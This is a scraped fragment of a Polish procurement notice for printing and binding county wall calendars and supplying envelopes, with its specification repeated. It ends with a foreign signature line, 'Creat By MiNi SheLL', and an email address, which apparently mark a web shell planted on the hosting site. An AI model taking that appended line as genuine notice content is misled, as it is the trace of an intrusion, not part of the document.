Druk i oprawa powiatowego kalendarza ściennego zgodnie z następującymi parametrami: 
format B3, 
układ pionowy, 
po krótszym boku biała metalowa spirala z białą zawieszką pośrodku, tzw. wąsy dł. ok. 10 cm, 
objętość: środek 6 kart, druk 4+4, papier kreda matowa  o gramaturze 250 g/m2, oraz 2 karty tj. okładka pierwsza (druk 4+0) i okładka ostatnia (druk 4+0), papier kreda matowa o gramaturze 250 g/m2, lakier UV błysk wybiórczy - 2 sita - na strony z kalendarium jedno i drugie na okładkę, dodatkowo plecki kartonowe białe (ok. 1/3 wysokości strony), na górnej krawędzi arkusza - przy spirali wycięcie na zawieszkę, 
pakowanie w paczki po 20 szt w szary papier pakowy, zabezpieczenie przed uszkodzeniem paczek, 
dostawa do siedziby zamawiającego.
Nakład 1100 szt.

Razem z kalendarzami wykonawca musi dostarczyć koperty (puste, poskładane i posklejane, gotowe do pakowania i wysyłki) o wielkości po złożeniu dostosowanej do B3 (bez konieczności składania czy zaginania kalendarza), umożliwiające bezpieczne zapakowanie 3-5 kalendarzy, bez zadruku, z mocną taśmą klejącą na zamknięciu (po zamknięciu nie może się rozklejać) białe lub jasno kremowe, kartonowe (np. z mikrofali), dostawa gotowych kopert do siedziby zamawiającego, pakowane w paczki po 20 szt. 
Nakład 300 szt.
Zamawiający wymaga dostawy w terminie maksymalnie 14 dni roboczych od dnia przesłania materiałów do druku na serwer Wykonawcy.
Krótszy czas realizacji jest dodatkowo punktowany, zgodnie z rozdziałem XV Kryteria oceny ofert i wybór oferty najkorzystniejszej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Druk i oprawa powiatowego kalendarza ściennego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Druk i oprawa powiatowego kalendarza ściennego zgodnie z następującymi parametrami: 
format B3, 
układ pionowy, 
po krótszym boku biała metalowa spirala z białą zawieszką pośrodku, tzw. wąsy dł. ok. 10 cm, 
objętość: środek 6 kart, druk 4+4, papier kreda matowa  o gramaturze 250 g/m2, oraz 2 karty tj. okładka pierwsza (druk 4+0) i okładka ostatnia (druk 4+0), papier kreda matowa o gramaturze 250 g/m2, lakier UV błysk wybiórczy - 2 sita - na strony z kalendarium jedno i drugie na okładkę, dodatkowo plecki kartonowe białe (ok. 1/3 wysokości strony), na górnej krawędzi arkusza - przy spirali wycięcie na zawieszkę, 
pakowanie w paczki po 20 szt w szary papier pakowy, zabezpieczenie przed uszkodzeniem paczek, 
dostawa do siedziby zamawiającego.
Nakład 1100 szt.

Razem z kalendarzami wykonawca musi dostarczyć koperty (puste, poskładane i posklejane, gotowe do pakowania i wysyłki) o wielkości po złożeniu dostosowanej do B3 (bez konieczności składania czy zaginania kalendarza), umożliwiające bezpieczne zapakowanie 3-5 kalendarzy, bez zadruku, z mocną taśmą klejącą na zamknięciu (po zamknięciu nie może się rozklejać) białe lub jasno kremowe, kartonowe (np. z mikrofali), dostawa gotowych kopert do siedziby zamawiającego, pakowane w paczki po 20 szt. 
Nakład 300 szt.
Zamawiający wymaga dostawy w terminie maksymalnie 14 dni roboczych od dnia przesłania materiałów do druku na serwer Wykonawcy.
Krótszy czas realizacji jest dodatkowo punktowany, zgodnie z rozdziałem XV Kryteria oceny ofert i wybór oferty najkorzystniejszej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com